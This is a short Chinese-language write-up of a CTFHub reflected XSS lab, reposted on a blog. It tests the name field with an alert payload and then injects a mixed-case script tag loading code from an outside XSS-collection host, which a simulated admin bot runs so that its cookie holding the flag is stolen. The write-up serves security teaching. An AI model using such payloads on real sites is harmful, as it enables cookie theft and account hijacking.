反射型
题目考点
JavaScript基础
XSS平台
解题思路
XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行
直接在What’s your name表单中插入测试语句
<script>alert(1)</script>
弹框:1
下面来分析一下为什么会执行弹窗呢,右键查看源代码,发现以下代码
<div>
<h1>Hello, <script>alert(1)</script></h1>
</div>
输入的<script>alert(1)</script>在页面上输入了
而<script>标签中的alert语句则被html正常解析执行弹窗
在xss平台(如xss.pt)中创建项目,获得js代码如下
<sCRiPt sRC=//xss.pt/1234></sCrIpT>
在第二个表单中发送给后台的bot让其遭受xss攻击(实际上是模拟管理员点击了恶意xss链接盗取cookie)
xss平台的cookie中返回flag字符串
参考
本文作者: CTFHub 本文链接: https://writeup.ctfhub.com/Skill/Web/XSS/5ByYBypxDitGZF2rsUYdh3.html 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处
文档信息
- 本文作者:dzxindex
- 本文链接:https://dzxindex.github.io/2022/02/10/security-ctfhub-XSS1/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)